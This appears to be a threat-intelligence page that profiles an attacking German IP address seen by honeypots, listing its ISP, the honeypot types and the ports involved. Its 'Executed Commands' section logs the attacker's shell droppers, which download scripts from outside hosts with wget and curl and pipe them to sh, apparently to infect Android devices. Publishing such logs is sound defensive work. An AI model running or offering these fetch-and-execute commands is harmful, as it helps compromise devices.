Active Threat • HIGH

176.65.139.44

Country of Origin🇩🇪 Germany

First Detection2/10/2026

Last Activity2/22/2026

ISPPfcloud UG (haftungsbeschrankt)

🎯

Total Attacks

🔌

Ports

📡

Attack Types

🦠

Malware

Geolocation

Country: 🇩🇪 Germany
City: Unknown
ASN: AS51396
ISP: Pfcloud UG (haftungsbeschrankt)

Attack Types

h0neytr4p

cowrie

honeyaml

adbhoney

tanner

miniprint

honeytrap

wordpot

Attacked Ports

238044330025555910025565

Associated Malware

No associated malware

Executed Commands

$echo hello4x

cd /data/local/tmp/; busybox wget http://89.32.41.15/w.sh; sh w.sh; curl http://89.32.41.15/c.sh; sh c.sh; wget http://89.32.41.15/wget.sh; sh wget.sh; curl http://89.32.41.15/wget.sh; sh wget.sh; busybox wget http://89.32.41.15/wget.sh; sh wget.sh; busybox curl http://89.32.41.15/wget.sh; sh wget.sh

rm -rf /data/local/tmp >/dev/null 2>&1; mkdir -p /data/local/tmp >/dev/null 2>&1; cd /data/local/tmp && (toybox wget -qO- http://130.12.180.55/wget.sh 2>/dev/null | sh || busybox wget -qO- http://130.12.180.55/wget.sh 2>/dev/null | sh || wget -qO- http://130.12.180.55/wget.sh 2>/dev/null | sh || curl -s http://130.12.180.55/wget.sh 2>/dev/null | sh) || echo 'hepsi bok gibi patladı aq' >/dev/stderr

Risk Assessment

/100

LowMediumHighCritical